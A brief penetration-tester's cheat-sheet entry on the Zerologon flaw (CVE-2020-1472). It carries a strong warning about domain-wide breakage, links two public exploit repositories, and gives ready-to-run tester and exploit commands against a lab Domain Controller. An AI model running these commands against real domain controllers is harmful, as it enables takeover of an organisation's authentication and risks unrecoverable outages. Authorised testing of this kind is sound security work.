What is?

What Is Zerologon?

EXTREMELY DANGEROUS

• What it does: Allows an attacker to take over a Domain Controller (DC) in seconds by exploiting a flaw in the Netlogon protocol.
• Why it's risky: Running this exploit can break authentication across the entire domain. If something goes wrong, recovery may not be possible without a backup.
• Verdict: DO NOT RUN this exploit unless it's a controlled environment (e.g., a test lab) and explicitly approved by the client.

GitHub Repo for Attacking/Testing Scripts

https://github.com/dirkjanm/CVE-2020-1472

https://github.com/SecuraBV/CVE-2020-1472

Testing

python3 zerologon_tester.py <dc-name> <dc-ip>
python3 zerologon_tester.py HYDRA-DC 192.168.150.128

Attack

python3 cve-2020-1472-exploit.py HYDRA-DC 192.168.150.128